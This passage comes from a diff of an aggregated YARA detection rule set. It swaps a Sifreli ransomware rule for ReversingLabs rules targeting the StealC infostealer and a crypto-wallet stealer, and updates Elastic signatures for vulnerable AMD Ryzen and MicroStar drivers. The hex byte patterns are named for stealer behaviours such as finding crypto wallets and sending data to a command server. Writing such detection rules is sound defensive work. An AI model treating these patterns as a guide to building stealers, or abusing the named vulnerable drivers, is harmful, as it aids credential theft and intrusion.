?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 + ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? + 85 C0 75 ?? 8D 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D + 4D ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 45 ?? 50 8D 8D + ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 55 ?? 52 8D 85 ?? ?? ?? ?? 50 + E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 4D ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? + 83 C4 ?? 85 C0 74 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? + ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? 33 C9 66 89 4D ?? 0F B7 15 ?? ?? ?? ?? + A1 ?? ?? ?? ?? 8D 0C 50 51 8D 55 ?? 52 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 + C4 ?? 8B 4D ?? 51 8B 15 ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8A 0D ?? + ?? ?? ?? 80 C1 ?? 88 0D ?? ?? ?? ?? 0F B7 55 ?? 33 C0 8B 0D ?? ?? ?? ?? 66 89 04 51 + 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 B9 ?? ?? ?? ?? C1 E1 ?? 8B 91 ?? ?? ?? ?? FF D2 85 + C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2 } - $bc_main_2 = { - 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8D 45 ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? - E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 33 C0 E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 45 ?? 8B 0D ?? ?? ?? ?? 8B 15 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 58 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB 11 BA ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8B D8 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 80 FB ?? 0F 85 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? B2 ?? A1 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ED A1 ?? ?? ?? ?? 8B 10 FF 52 ?? 83 F8 ?? 0F - 8E ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 10 FF 52 ?? 99 F7 3D ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 10 FF 52 ?? 99 F7 3D - ?? ?? ?? ?? 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 48 85 C0 7C ?? 40 89 45 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? + $find_crypto_wallets_1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? + ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? + ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? + 51 8B 55 ?? 52 B8 ?? ?? ?? ?? 6B C8 ?? 8B 91 ?? ?? ?? ?? FF D2 89 45 ?? 8B 45 ?? 50 + E8 ?? ?? ?? ?? 83 C4 ?? 33 C9 8B 55 ?? 66 89 4C 42 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? + 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 66 89 45 ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? + ?? ?? 83 C4 ?? 0F B7 55 ?? 8D 44 10 ?? 3D ?? ?? ?? ?? 72 ?? E9 ?? ?? ?? ?? 8D 8D ?? + ?? ?? ?? 51 8B 55 ?? 52 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? + ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? D1 + E0 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 8D ?? ?? ?? ?? 83 E1 + ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 + C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 + C0 0F 84 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 8D + ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? + B9 ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 95 ?? ?? ?? ?? B8 ?? ?? ?? + ?? 66 89 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? 33 C0 + 66 89 45 ?? 8D 4D ?? 51 6A ?? 8D 95 ?? ?? ?? ?? 52 0F B7 45 ?? 50 8B 4D ?? 51 8B 55 + ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 + ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 95 } - $bc_main2 = { - E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 45 ?? - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D - ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 + $find_crypto_wallets_2 = { + 0D ?? ?? ?? ?? 80 C1 ?? 88 0D ?? ?? ?? ?? 83 7D ?? ?? 76 ?? 8A 15 ?? ?? ?? ?? 80 C2 + ?? 88 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? + ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 25 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 3D ?? + ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? + ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? + B8 ?? ?? ?? ?? C1 E0 ?? 8B 4D ?? 0F B6 14 01 83 FA ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? + ?? 6B C8 ?? 8B 55 ?? 0F B6 04 0A 83 F8 ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 6B D1 ?? + 8B 45 ?? 0F B6 0C 10 83 F9 ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 6B C2 ?? 8B 4D ?? 0F + B6 14 01 83 FA ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? B9 ?? ?? ?? + ?? 66 89 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 + ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 95 ?? ?? ?? ?? + B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? BA } condition: - uint16(0)==0x5A4D and ($bc_main_1 at pe.entry_point) and $bc_main_2 and $bc_main2 and $bc_bcdedit and $bc_enum_drives_a_z and $bc_do_extensions_1 and $bc_do_extensions_2 and $bc_do_files_1 and $bc_do_files_2 + uint16(0)==0x5A4D and ( all of ($collect_os_information_p*)) and ( all of ($send_data_to_c2_p*)) and ( all of ($find_files_p*)) and ( all of ($find_crypto_wallets_*)) } -rule REVERSINGLABS_Win32_Ransomware_Sifreli : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_Infostealer_Stealc : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Sifreli ransomware." + description = "Yara rule that detects StealC infostealer." author = "ReversingLabs" - id = "974f81e2-6907-54da-97e3-3116c41b5ed4" - date = "2020-10-08" - modified = "2020-10-08" + id = "b53bbf15-3e94-513c-91a9-83dda421063b" + date = "2023-06-07" + modified = "2023-06-07" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Sifreli.yara#L1-L119" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "48f6cc678bea81afece0ae203fb27b61e2c6e4f7188a3bd260190f568c9a8a06" - score = 75 - quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Sifreli" - tc_detection_factor = 5 - importance = 25 - - strings: - $find_files = { - 55 8B EC 83 EC ?? 53 56 57 8B 7D ?? 8B C7 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? - 2B C2 D1 F8 8D 44 00 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? - 6A ?? 50 FF D6 8B D8 89 5D ?? 85 DB 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? - ?? ?? ?? 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 51 FF D6 8B F8 85 FF 0F 84 ?? ?? ?? - ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ?? ?? 3D ?? ?? - ?? ?? 1B C0 40 A3 ?? ?? ?? ?? EB ?? A1 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 57 50 53 FF 15 - ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 90 F6 07 ?? 74 - ?? BB ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 47 ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 - 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 33 DB EB ?? - 1B C0 83 D8 ?? 85 C0 74 ?? B9 ?? ?? ?? ?? 8D 47 ?? 8D 49 ?? 66 8B 10 66 3B 11 75 ?? - 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 - EB ?? 1B C0 83 D8 ?? 85 C0 74 ?? 8B 55 ?? 8B 4D ?? 52 8D 47 ?? 50 8B 07 50 53 68 ?? - ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 55 ?? 57 52 FF 15 ?? ?? ?? ?? 85 - C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 5D ?? EB ?? C7 45 ?? ?? ?? ?? - ?? 8B 0D ?? ?? ?? ?? 57 6A ?? 51 FF 15 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? 8B 15 - ?? ?? ?? ?? 53 6A ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3 5F 5E B8 ?? - ?? ?? ?? 5B 8B E5 5D C3 - } - $remote_connection_p1 = { - 55 8B EC 83 EC ?? 53 33 DB 8D 45 ?? 89 5D ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? - 8B 45 ?? 8B 4D ?? 56 57 50 51 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B 55 ?? 8B - 4D ?? 52 57 E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 8B 45 ?? 6A - ?? 50 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B D6 E8 ?? ?? ?? ?? 85 C0 74 ?? - C7 45 ?? ?? ?? ?? ?? 56 FF D3 8D 4D ?? 51 8D 55 ?? 52 6A ?? 57 C7 45 ?? ?? ?? ?? ?? - C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 57 8B F0 FF D3 85 F6 74 ?? 8B 45 ?? 50 FF D3 - 8B 5D ?? 83 7D ?? ?? 8B 35 ?? ?? ?? ?? 74 ?? 8B 4D ?? 8B 15 ?? ?? ?? ?? 51 6A ?? 52 - FF D6 8B 45 ?? 85 C0 74 ?? 50 A1 ?? ?? ?? ?? 6A ?? 50 FF D6 5F 5E 8B C3 5B 8B E5 5D - C3 8B C3 5B 8B E5 5D C3 - } - $remote_connection_p2 = { - 55 8B EC 83 EC ?? 56 57 68 ?? ?? ?? ?? 33 FF 57 57 57 57 FF 15 ?? ?? ?? ?? 8B F0 85 - F6 74 ?? 8B 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? 6A ?? 89 45 ?? 89 45 ?? 8D 45 ?? 50 6A ?? - 56 C7 45 ?? ?? ?? ?? ?? FF D7 6A ?? 8D 4D ?? 51 6A ?? 56 FF D7 6A ?? 8D 55 ?? 52 6A - ?? 56 FF D7 8B 45 ?? 8B 4D ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 50 51 56 FF 15 ?? ?? ?? - ?? 8B F8 85 FF 75 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 8B E5 5D C3 - } - $remote_connection_p3 = { - 55 8B EC 83 EC ?? 53 56 8B F0 33 C0 89 06 57 89 46 ?? 89 46 ?? 6A ?? 50 89 46 ?? 8D - 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 6A ?? BF ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? 89 7D ?? 89 7D ?? 89 7D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? - ?? ?? ?? 8B 4D ?? 8B 1D ?? ?? ?? ?? 8D 4C 09 ?? 33 C0 85 C9 74 ?? 8B 15 ?? ?? ?? ?? - 51 50 52 FF D3 89 06 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 51 52 50 E8 ?? ?? ?? - ?? 8B 06 8B 55 ?? 33 C9 66 89 0C 50 8B 4D ?? 83 C4 ?? 85 C9 74 ?? 8B 45 ?? 66 83 38 - ?? 75 ?? 83 45 ?? ?? 2B CF 89 4D ?? 85 C9 75 ?? 8B 55 ?? 8D 7C 0A ?? 8D 54 3F ?? 33 - C0 85 D2 74 ?? 52 50 A1 ?? ?? ?? ?? 50 FF D3 8B 4D ?? 89 46 ?? 85 C0 74 ?? 51 8B 4D - ?? 51 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 4E ?? 52 8B 55 ?? 50 8D 44 51 - ?? 50 E8 ?? ?? ?? ?? 8B 46 ?? B9 ?? ?? ?? ?? 66 89 08 33 D2 66 89 14 78 66 8B 45 ?? - 83 C4 ?? 83 7D ?? ?? 66 89 46 ?? 75 ?? 83 4E ?? ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D - C3 8B 36 85 F6 74 ?? 8B 0D ?? ?? ?? ?? 56 6A ?? 51 FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B - 8B E5 5D C3 - } - $encrypt_files_1 = { - 8B C3 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 57 8B F8 8D 4C 3F ?? 33 - C0 85 C9 74 ?? 51 50 A1 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8B F0 8B CB - 2B F3 8D 9B ?? ?? ?? ?? 0F B7 11 66 89 14 0E 83 C1 ?? 66 85 D2 75 ?? B9 ?? ?? ?? ?? - 8D 34 3F 2B F1 03 F0 EB ?? 8D 49 ?? 0F B7 11 66 89 14 0E 83 C1 ?? 66 85 D2 75 ?? 5E - 5F C3 + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/infostealer/Win32.Infostealer.StealC.yara#L1-L57" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "bea1cf370150387eb185deff726e10e660e7eb571c20d22878def08b36f457bf" + score = 75 + quality = 90 + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "MALWARE" + tc_detection_type = "Infostealer" + tc_detection_name = "StealC" + tc_detection_factor = 5 + importance = 25 + + strings: + $resolve_windows_api = { + 55 8B EC 51 83 65 ?? ?? 56 64 A1 ?? ?? ?? ?? 8B 40 ?? 8B 40 ?? 8B 00 8B 00 8B 40 ?? + 89 45 ?? 8B 75 ?? 89 35 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? + ?? ?? ?? A3 ?? ?? ?? ?? 56 FF D0 FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 } - $encrypt_files_2 = { - 83 E8 ?? 53 56 57 8B DA 74 ?? 48 74 ?? 5F 5E 33 C0 5B C3 53 51 33 F6 E8 ?? ?? ?? ?? - 83 C4 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8B F0 33 FF 85 F6 74 ?? 56 53 FF 15 ?? ?? ?? ?? - 85 C0 74 ?? BF ?? ?? ?? ?? A1 ?? ?? ?? ?? 56 6A ?? 50 FF 15 ?? ?? ?? ?? 8B F7 5F 8B - C6 5E 5B C3 53 51 33 F6 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8B F0 33 - FF 85 F6 74 ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? BF ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? - 56 6A ?? 51 FF 15 ?? ?? ?? ?? 8B F7 5F 8B C6 5E 5B C3 ?? ?? 55 8B EC 8B 4D ?? 8B 41 - ?? 83 F8 ?? 0F 8F ?? ?? ?? ?? F7 45 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 40 53 89 41 ?? - 8B 45 ?? 83 E8 ?? 56 57 74 ?? 48 0F 85 ?? ?? ?? ?? 8B 7D ?? 33 F6 8D 9B ?? ?? ?? ?? - 8B 86 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 83 - FE ?? 72 ?? 8B 5D ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 8B 4D ?? 51 56 E8 ?? ?? ?? ?? - 83 C4 ?? EB ?? 8B 41 ?? 83 E8 ?? 74 ?? 48 75 ?? 8B 75 ?? E8 ?? ?? ?? ?? EB ?? 8B 75 - ?? 8B C6 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 85 C0 74 ?? 8B 5D ?? 8B FE E8 ?? ?? ?? ?? - 8B F0 85 F6 74 ?? 8B 7D ?? 8B 47 ?? 8B 0F 8B D6 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 47 ?? - 85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B 45 ?? FF 48 ?? 5F 5E 5B B8 - ?? ?? ?? ?? 5D C3 + $load_sqlite3_functions = { + 55 8B EC 83 EC ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 50 89 45 ?? 89 4D ?? 8B 4D ?? 8D + 45 ?? 50 89 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 45 ?? 57 89 45 ?? 8B 7D ?? + B9 ?? ?? ?? ?? 33 C0 F3 AA 5F 33 C0 C9 C3 8B 45 ?? 85 C0 74 ?? 53 8B 58 ?? 56 8B 70 + ?? FF 35 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 + ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? + A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? + ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 } - $encrypt_files_3 = { - 8B C6 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 83 C0 ?? 85 C0 7E ?? EB - ?? 8D 49 ?? 66 83 3C 46 ?? 74 ?? 48 85 C0 7F ?? 33 C0 C3 8D 44 46 ?? 85 C0 74 ?? 83 - C0 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? C3 + $check_license_expiration_date = { + 55 8B EC 83 E4 ?? 83 EC ?? 57 33 C0 66 89 44 24 ?? 83 64 24 ?? ?? 8D 7C 24 ?? AB AB + AB 66 AB 33 C0 66 89 44 24 ?? 8D 7C 24 ?? AB AB AB 66 AB 33 C0 21 44 24 ?? 8D 7C 24 + ?? AB 8D 7C 24 ?? AB 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 7C 24 ?? E8 ?? ?? ?? ?? 8D + 4C 24 ?? 51 8D 4C 24 ?? 51 8D 4C 24 ?? 51 FF 35 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ?? + 8B 44 24 ?? 83 C4 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? + 8D 44 24 ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 3B 44 24 ?? 72 ?? 77 ?? + 8B 44 24 ?? 3B 44 24 ?? 76 ?? 6A ?? FF 15 ?? ?? ?? ?? 5F 8B E5 5D C3 } condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_*)) and ( all of ($remote_connection_p*)) + uint16(0)==0x5A4D and ($resolve_windows_api) and ($load_sqlite3_functions) and ($check_license_expiration_date) } /* * YARA Rule Set * Repository Name: Elastic * Repository: https://github.com/elastic/protections-artifacts/ - * Retrieval Date: 2024-09-08 - * Git Commit: ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494 + * Retrieval Date: 2024-09-29 + * Git Commit: d59600196a2d19f5ac8e25b603e811946eebe1d1 * Number of Rules: 1781 * Skipped: 0 (age), 6 (quality), 0 (score), 0 (importance) * @@ -56181,24 +56528,24 @@ these terms. **trademark** means trademarks, service marks, and similar rights. */ -rule ELASTIC_Windows_Vulndriver_Microstar_D72B85B2 : FILE +rule ELASTIC_Windows_Vulndriver_Ryzen_7Df5A747 : FILE { meta: - description = "Name: NTIOLib.sys, Version: 1.0.0.0" + description = "Name: AMDRyzenMasterDriver.sys, Version: 1.5.0.0" author = "Elastic Security" - id = "d72b85b2-b51e-4061-909c-cce531513367" + id = "7df5a747-d924-459d-8363-9c12841ef37f" date = "2022-04-07" modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_MicroStar.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3ed15a390d8dfbd8a8fb99e8367e19bfd1cced0e629dfe43ccdb46c863394b59" - logic_hash = "04e9c1f318acae5544cdc826938383bf8f6c6b838cb5828a7097383ac564f404" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Ryzen.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433" + logic_hash = "192b51f0bbd2cab4c1d3da6f82fbee7129a53abaa6e8769d3681821112017824" score = 75 quality = 75 tags = "FILE" - fingerprint = "a531bc0b1a94b532694c9ae421db258007d835e03cf2580a1b5a10e5686063e5" - threat_name = "Windows.VulnDriver.MicroStar" + fingerprint = "1bf5d6b2739ce4fe5137cff84e7bfb9389e8d175480094fe831f8f68d84abb16" + threat_name = "Windows.VulnDriver.Ryzen" severity = 50 arch_context = "x86" scan_context = "file" @@ -56206,115 +56553,303 @@ rule ELASTIC_Windows_Vulndriver_Microstar_D72B85B2 : FILE os = "windows" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 4E 00 54 00 49 00 4F 00 4C 00 69 00 62 00 2E 00 73 00 79 00 73 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x00][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x00][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 41 00 4D 00 44 00 52 00 79 00 7A 00 65 00 6E 00 4D 00 61 00 73 00 74 00 65 00 72 00 44 00 72 00 69 00 76 00 65 00 72 00 2E 00 73 00 79 00 73 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x05][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x00][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x04][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ condition: int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version } -rule ELASTIC_Linux_Trojan_Marut_47Af730D : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Ryzen_9B01C718 : FILE { meta: - description = "Detects Linux Trojan Marut (Linux.Trojan.Marut)" + description = "Name: AMDRyzenMasterDriver.sys, Version: <= 1.7.0.0" author = "Elastic Security" - id = "47af730d-1e03-4d27-9661-84fb12b593bd" - date = "2021-01-12" - modified 